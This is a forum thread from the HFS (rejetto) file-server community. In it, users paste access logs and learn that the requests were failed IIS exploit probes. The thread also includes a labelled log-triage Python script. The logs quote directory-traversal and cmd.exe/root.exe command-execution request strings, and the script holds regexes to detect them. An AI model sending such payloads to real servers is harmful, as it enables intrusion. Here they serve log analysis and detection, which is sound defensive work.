rejetto forum

Check this out...


Offline Chez

Look what I found in my HFS log:

07:58:31  64.166.117.133:2702 Requested GEThttp://hpcgi1.nifty.com/trino/ProxyJ/prxjdg.cgi
07:58:31  64.166.117.133:2702 Fully downloaded


What the hell is this?


Offline rejetto

someone requested that URL to your HFS.
i guess HFS replied with a 404 error, but older builds (current is rc13) had a bug showing "fully downloaded" in the log for errors too


Offline SAT

Hello Rejetto, can you tell me what this user was doing? And how can I tell what information he received?

2/18/2004 1:46:15 PM  24.59.78.218:3196 Connected
2/18/2004 1:46:15 PM  24.59.78.218:3196 Requested GET/scripts/root.exe?/c dir
2/18/2004 1:46:15 PM  24.59.78.218:3196 Fully downloaded
2/18/2004 1:46:16 PM  24.59.78.218:3298 Connected
2/18/2004 1:46:16 PM  24.59.78.218:3298 Requested GET/MSADC/root.exe?/c dir
2/18/2004 1:46:16 PM  24.59.78.218:3298 Fully downloaded
2/18/2004 1:46:17 PM  24.59.78.218:3347 Connected
2/18/2004 1:46:17 PM  24.59.78.218:3347 Requested GET/c/winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:17 PM  24.59.78.218:3347 Fully downloaded
2/18/2004 1:46:18 PM  24.59.78.218:3371 Connected
2/18/2004 1:46:18 PM  24.59.78.218:3371 Requested GET/d/winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:18 PM  24.59.78.218:3371 Fully downloaded
2/18/2004 1:46:19 PM  24.59.78.218:3393 Connected
2/18/2004 1:46:19 PM  24.59.78.218:3393 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:19 PM  24.59.78.218:3393 Fully downloaded
2/18/2004 1:46:19 PM  24.59.78.218:3416 Connected
2/18/2004 1:46:20 PM  24.59.78.218:3416 Requested GET/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:20 PM  24.59.78.218:3416 Fully downloaded
2/18/2004 1:46:20 PM  24.59.78.218:3430 Connected
2/18/2004 1:46:20 PM  24.59.78.218:3430 Requested GET/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:20 PM  24.59.78.218:3430 Fully downloaded
2/18/2004 1:46:21 PM  24.59.78.218:3450 Connected
2/18/2004 1:46:21 PM  24.59.78.218:3450 Requested GET/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:21 PM  24.59.78.218:3450 Fully downloaded
2/18/2004 1:46:22 PM  24.59.78.218:3509 Connected
2/18/2004 1:46:22 PM  24.59.78.218:3509 Requested GET/scripts/..Á../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:22 PM  24.59.78.218:3509 Fully downloaded
2/18/2004 1:46:23 PM  24.59.78.218:3530 Connected
2/18/2004 1:46:23 PM  24.59.78.218:3530 Requested GET/scripts/..À/../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:23 PM  24.59.78.218:3530 Fully downloaded
2/18/2004 1:46:24 PM  24.59.78.218:3549 Connected
2/18/2004 1:46:24 PM  24.59.78.218:3549 Requested GET/scripts/..À¯../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:24 PM  24.59.78.218:3549 Fully downloaded
2/18/2004 1:46:25 PM  24.59.78.218:3574 Connected
2/18/2004 1:46:25 PM  24.59.78.218:3574 Requested GET/scripts/..Áœ../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:25 PM  24.59.78.218:3574 Fully downloaded
2/18/2004 1:46:29 PM  24.59.78.218:3590 Connected
2/18/2004 1:46:35 PM  24.59.78.218:3590 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:35 PM  24.59.78.218:3590 Fully downloaded
2/18/2004 1:46:36 PM  24.59.78.218:3872 Connected
2/18/2004 1:46:36 PM  24.59.78.218:3872 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:36 PM  24.59.78.218:3872 Fully downloaded


Offline rejetto

he's trying to exploit IIS
but no IIS here  :roll:
he got nothing

as i already said, the "fully downloaded" is a bug in the log of your version
update to get rid of it
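
Added example, not part of the original thread or of HFS: a small triage script for logs in the format quoted above, flagging the request shapes seen in the two pasted logs (an absolute-URL request, `cmd.exe`/`root.exe` called with a query string, and `..` traversal sequences). The rule names, the regexes and the sample log, including the 192.0.2.10 lines, are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in the log format quoted in this thread (GET is fused to the target).
SAMPLE_LOG = """\
07:58:31  64.166.117.133:2702 Requested GEThttp://hpcgi1.nifty.com/trino/ProxyJ/prxjdg.cgi
2/18/2004 1:46:15 PM  24.59.78.218:3196 Requested GET/scripts/root.exe?/c dir
2/18/2004 1:46:17 PM  24.59.78.218:3347 Requested GET/c/winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:19 PM  24.59.78.218:3393 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:22 PM  24.59.78.218:3509 Requested GET/scripts/..Á../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:40 PM  192.0.2.10:4001 Requested GET/music/song.mp3
2/18/2004 1:46:41 PM  192.0.2.10:4001 Fully downloaded
"""

# Source IP, method, request target; the space after the method is optional.
REQ = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3}):\d+ Requested (GET|HEAD|POST) ?(.+)$")

# Hypothetical rule names; each regex is matched against the request target only.
RULES = [
    ("proxy_probe", re.compile(r"^https?://", re.I)),          # absolute URL sent to a file server
    ("shell_binary", re.compile(r"(?:cmd|root)\.exe\?", re.I)),  # command interpreter plus arguments
    ("traversal", re.compile(r"\.\.(?:[/\\]|%5c|%2f|%25|[^\x00-\x7f])", re.I)),
]

def classify(target):
    """Return the set of rule names that match one request target."""
    return {name for name, rx in RULES if rx.search(target)}

def scan(log_text):
    """Return {source_ip: {"requests": n, "labels": set}} for flagged sources only."""
    hits = defaultdict(lambda: {"requests": 0, "labels": set()})
    for line in log_text.splitlines():
        m = REQ.search(line)
        if not m:
            continue  # "Connected" / "Fully downloaded" lines carry no request target
        labels = classify(m.group(3))
        if labels:
            hits[m.group(1)]["requests"] += 1
            hits[m.group(1)]["labels"] |= labels
    return dict(hits)

if __name__ == "__main__":
    for ip, info in scan(SAMPLE_LOG).items():
        print(ip, info["requests"], sorted(info["labels"]))
```

A flagged line records an attempt only. On the builds discussed in this thread "Fully downloaded" was also logged for error replies, so it does not show that anything was returned.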


Offline SAT

Quote from: "rejetto"
he's trying to exploit IIS
but no IIS here  :roll:
he got nothing

as i already said, the "fully downloaded" is a bug in the log of your version
update to get rid of it

Thanks for your reply sir. That is my ISP trying to see what I am sharing.
he's also looking for c: I am using F: :-)

I am running v1.6 rc11... I am having some trouble understanding how to automate creating log files daily, but otherwise am very grateful for your work. This is a kick-ass http server.
I didn't see any links for donations? I want to donate.


Anonymous

  • Guest
Quote from: "SAT"
I didn't see any links for donations? I want to donate.

Look here - right bottom... :
http://www.rejetto.com/


Offline rejetto

daily log?
the log file is not locked most of the time, so you can use an external "rotation" software (i think apache has one)


Offline SAT

Quote from: "Anonymous"
Quote from: "SAT"
I didn't see any links for donations? I want to donate.

Look here - right bottom... :
http://www.rejetto.com/

I will "little bit each time...so I don't miss it"


Offline rejetto

thank you for the donation :)
really appreciated
i shall put the paypal button somewhere else